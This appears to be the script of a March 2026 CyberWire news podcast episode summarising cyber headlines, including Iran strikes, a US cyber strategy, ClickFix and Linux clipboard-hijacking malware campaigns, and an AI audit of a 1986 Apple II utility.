From Tehran to the Apple II.

Israel claims a strike on Iran’s cyber warfare headquarters. The Trump administration releases a new national cyber strategy. DHS shakes up its IT and cybersecurity leadership. Velvet Tempest uses ClickFix to drop loaders and RATs. Researchers uncover a Linux cryptocurrency clipboard hijacker. The DOJ brings a Ghanaian romance scammer to justice. Online advertising enables government tracking. Monday business breakdown. Our guest is Jon France, CISO from ISC2, sharing some insights and findings from their 2025 ISC2 Cybersecurity Workforce Study. An Apple II app gets audited by AI. 

Today is Monday March 9th 2026. I’m Dave Bittner. And this is your CyberWire Intel Briefing.

Israel claims a strike on Iran’s cyber warfare headquarters. 

Israel says it struck a Tehran compound that allegedly housed Iran’s cyber warfare headquarters, the Intelligence Directorate, and other key military units, including elements of the Islamic Revolutionary Guard Corps (IRGC). The Israel Defense Forces announced the operation but provided few operational details beyond a digital illustration of the site. While the strike targeted facilities linked to Iran’s cyber operations, its actual impact on Tehran’s cyber capabilities remains unclear.

Threat intelligence monitoring suggests cyber activity tied to Iran has continued despite the attack. Analysts note that cyber operations often rely on distributed infrastructure and remote operators, meaning physical facilities are not always critical to ongoing campaigns. Additionally, a nationwide internet blackout in Iran following February 28 U.S.-Israeli strikes appears to have disrupted connectivity more than the destruction of the compound itself.

Security researchers warn that Iranian state-sponsored groups had already established access within regional networks before hostilities escalated. These pre-positioned capabilities, along with externally operated infrastructure, could allow operations to continue even while domestic connectivity is degraded.

The Trump administration releases a new national cyber strategy.  

The Trump administration released a new national cyber strategy Friday that emphasizes stronger offensive cyber operations, protection of federal networks and critical infrastructure, streamlined regulations, and expanded use of emerging technologies like artificial intelligence and post-quantum cryptography. The document outlines six pillars, including shaping adversary behavior through both government and private-sector cyber capabilities, modernizing federal systems with zero-trust and advanced encryption, securing infrastructure and supply chains, and building a stronger cybersecurity workforce.

The strategy also promotes reducing regulatory burdens while encouraging coordination between government and industry. Separately, Trump signed an executive order directing agencies to prioritize prosecution of cybercrime and fraud, including efforts against foreign-backed criminal networks.

Industry groups broadly welcomed the strategy’s focus on deterrence, innovation, and regulatory reform, though some lawmakers criticized it as vague and lacking a detailed implementation plan. The White House said more detailed guidance will follow in future policy documents.

DHS shakes up its IT and cybersecurity leadership. 

The Department of Homeland Security is undergoing a major shakeup in its IT and cybersecurity leadership, with multiple senior officials departing amid a broader reorganization. Chief Information Security Officer Hemant Baidwan is expected to leave later this month, following the February exit of Deputy CISO Amanda Day, who has joined Workday as vice president of cybersecurity and trust.

Sources say the changes are part of a wider realignment led by DHS Chief Information Officer Antoine McCord, aimed at consolidating IT leadership across the department’s component agencies under the central DHS CIO office. The effort reportedly includes placing headquarters personnel into key technology roles across agencies such as FEMA and CISA.

The leadership churn coincides with other high-level changes, including the departure of Homeland Security Secretary Kristi Noem. Some officials warn the upheaval could risk a “brain drain” at DHS during a period of heightened geopolitical tensions and cyber threats.

Velvet Tempest uses ClickFix to drop loaders and RATs. 

The ransomware group Velvet Tempest is using the ClickFix social engineering technique and built-in Windows tools to deploy DonutLoader malware and the CastleRAT backdoor, according to researchers at MalBeacon. The activity was observed over 12 days in an emulated U.S. nonprofit network with more than 3,000 endpoints.

Attackers gained access through a malvertising campaign that presented a fake CAPTCHA and instructed victims to paste an obfuscated command into the Windows Run dialog. This command launched nested command-line processes that downloaded malware loaders, followed by PowerShell scripts used for reconnaissance, credential harvesting from Chrome, and staging additional payloads.

The intrusion ultimately deployed DonutLoader and retrieved CastleRAT, enabling persistent remote access. Although Velvet Tempest is known for deploying major ransomware strains such as Ryuk, REvil, Conti, and LockBit, researchers did not observe ransomware being executed in this case.

Researchers uncover a Linux cryptocurrency clipboard hijacker. 

Researchers at Cyble Research and Intelligence Labs identified a new Linux malware strain called ClipXDaemon, an autonomous cryptocurrency clipboard hijacker targeting X11-based environments. Delivered through a loader structure previously linked to ShadowHS activity, the malware appears unrelated to that campaign, with both likely using the same open-source bincrypter encryption framework independently.

ClipXDaemon operates without command-and-control infrastructure or external communication. Instead, it monetizes victims by monitoring the system clipboard and replacing copied cryptocurrency wallet addresses with attacker-controlled ones. The malware targets multiple currencies, including Bitcoin and Ethereum.

The attack chain uses a three-stage process: an encrypted loader, a memory-resident dropper, and a persistent on-disk ELF payload. It employs stealth techniques such as process masquerading, daemonization, and avoidance of Wayland sessions, operating only in X11 environments. Researchers say the campaign reflects a shift toward autonomous, user-focused financial malware on Linux systems.

The DOJ brings a Ghanaian romance scammer to justice. 

A Ghanaian [guh-NAY-un] national, Derrick Van Yeboah, pleaded guilty to participating in a global fraud scheme involving romance scams and business email compromise (BEC), according to the U.S. Justice Department. The Ghana-based operation caused more than $100 million in losses, with about $10 million attributed to Van Yeboah. Prosecutors say he posed as romantic partners to gain victims’ trust and convince them to send money, and also impersonated business executives or suppliers in BEC scams to redirect corporate payments. He additionally helped launder proceeds from the fraud. Van Yeboah pleaded guilty to conspiracy to commit wire fraud, which carries a maximum 20-year prison sentence, and agreed to pay more than $10 million in restitution and forfeiture.

Online advertising enables government tracking. 

New reporting shows U.S. Customs and Border Protection has used location data drawn from the online advertising ecosystem to track people’s phones without warrants. Documents obtained by 404 Media confirm the agency relied partly on data generated through real-time bidding (RTB), the advertising process that auctions ad space on websites and apps. RTB broadcasts user information such as device identifiers and location data to thousands of companies during ad auctions, allowing data brokers to collect and sell that information. Law enforcement agencies have purchased this data to track individuals’ movements, often bypassing traditional warrant requirements.

Privacy advocates warn the practice exposes how surveillance-based advertising systems can enable government monitoring. Experts urge stronger privacy laws, limits on precise location data in ad systems, and restrictions on the sale of sensitive data to authorities. Individuals can reduce exposure by disabling advertising IDs and limiting apps’ location permissions.

Monday business breakdown. 

Several cybersecurity startups announced major funding rounds as investors continue backing AI-driven security platforms and resilience technologies. UpGuard raised $75 million in a Series C round to expand its AI-powered cyber risk posture management platform and pursue acquisitions. Israeli firms Gambit Security and Fig Security emerged from stealth with $61 million and $38 million respectively to develop cyber resilience and SecOps platforms. JetStream Security launched with $34 million for AI governance and security tools, while ThreatAware secured $25 million to expand its cyber asset management platform. ArmorCode raised $16 million to advance its AI exposure management platform, and Secfix obtained $12 million to grow its compliance automation services.

In mergers and acquisitions, Zurich Insurance Group plans to acquire UK cyber insurer Beazley for about $11 billion to expand cyber risk coverage. Other deals include Ekco acquiring OT security firm Datalogix, Myriad360 buying technology provider Advizex, and Bastion Security Group acquiring Australian security engineering firm Astralas.

 

An Apple II app gets audited by AI. 

Microsoft Azure CTO Mark Russinovich recently decided to revisit a piece of his own programming history, a small Apple II utility he wrote in 1986, and gave it a modern audit courtesy of AI. The program, called Enhancer, was written in 6502 machine code to extend Applesoft BASIC with more flexible GOTO and GOSUB commands.

Enter Claude Opus 4.6, which promptly decompiled the four-decade-old code and spotted several flaws, including a subtle bug where the program quietly misbehaved instead of throwing an error when a destination line wasn’t found. The fix, in hindsight, was simple: check the carry flag.

The discovery is mostly nostalgic trivia for Apple II enthusiasts, but it highlights a broader shift. Modern AI systems can now analyze low-level code and uncover vulnerabilities in software that humans may not have examined for decades. That capability could help defenders patch old systems, though it also gives attackers a powerful new way to hunt for bugs lurking in the world’s vast supply of aging firmware and legacy code.

 

And that’s the CyberWire.

For links to all of today’s stories, check out our Daily Briefing at the cyberwire dot com.

Don’t forget to check out the “Grumpy Old Geeks'' podcast where I contribute to a regular segment on Jason and Brians’s show, every week. You can find “Grumpy Old Geeks'' where all the fine podcasts are listed.  </Mondays>

We’d love to know what you think of this podcast. Your feedback ensures we deliver the insights that keep you a step ahead in the rapidly changing world of cybersecurity. If you like the show, please share a rating and review in your podcast app. Please also fill out the survey in the show notes or send an email to cyberwire@n2k.com

We’re proud that N2K CyberWire is part of the daily routine of the most influential leaders and operators in the public and private sector, from the Fortune 500 to many of the world’s preeminent intelligence and law enforcement agencies.

N2K helps cybersecurity professionals and organizations grow, learn, and stay ahead. We’re the nexus for discovering the people, tech, and ideas shaping the industry.  Learn how at n2k.com.

N2K’s lead producer is Liz Stokes. We’re mixed by  Tré Hester, with original music by and sound design Elliott Peltzman. Our contributing host is Maria Varmazis. Our executive producer is Jennifer Eiben. Peter Kilpe is our publisher. And I’m Dave Bittner. Thanks for listening.